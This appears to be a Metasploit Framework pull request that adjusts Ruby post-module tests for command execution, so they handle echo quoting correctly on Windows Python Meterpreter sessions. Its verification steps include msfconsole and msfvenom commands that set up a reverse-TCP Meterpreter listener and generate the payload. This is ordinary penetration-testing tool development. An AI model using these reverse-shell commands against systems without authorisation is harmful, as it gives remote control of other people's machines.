### PR TITLE
fix cmd_exec tests on python/windows

### DIFF
--- a/test/modules/post/test/cmd_exec.rb
+++ b/test/modules/post/test/cmd_exec.rb
@@ -71,7 +71,10 @@ class MetasploitModule < Msf::Post
 
     it "should return the result of echo with single quotes" do
       test_string = Rex::Text.rand_text_alpha(4)
-      if session.platform.eql? 'windows'
+      if session.platform.eql? 'windows' and session.arch == ARCH_PYTHON
+        output = cmd_exec("cmd.exe", "/c echo \"#{test_string}\"")
+        output == test_string
+      elsif session.platform.eql? 'windows'
         output = cmd_exec("cmd.exe", "/c echo '#{test_string}'")
         output == "'" + test_string + "'"
       else
@@ -82,7 +85,10 @@ class MetasploitModule < Msf::Post
 
     it "should return the result of echo with double quotes" do
       test_string = Rex::Text.rand_text_alpha(4)
-      if session.platform.eql? 'windows'
+      if session.platform.eql? 'windows' and session.arch == ARCH_PYTHON
+        output = cmd_exec("cmd.exe", "/c echo \"#{test_string}\"")
+        output == test_string
+      elsif session.platform.eql? 'windows'
         output = cmd_exec("cmd.exe", "/c echo \"#{test_string}\"")
         output == "\"" + test_string + "\""
       else


### PR DESCRIPTION
This change works around https://github.com/rapid7/metasploit-framework/issues/11935 
Alternatively we could skip the test.

## Verification

List the steps needed to make sure this thing works

- [x] `msfconsole -qx "use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set PythonMeterpreterDebug true; set ExitOnSession false; run -j"`
- [x] `msfvenom -p python/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o "$1"`
- [x] Run the python payload on Windows
- [x] Run the tests:
```
loadpath test/modules
use post/test/cmd_exec
set SESSION -1
exploit
```
- [x] **Verify** the tests pass

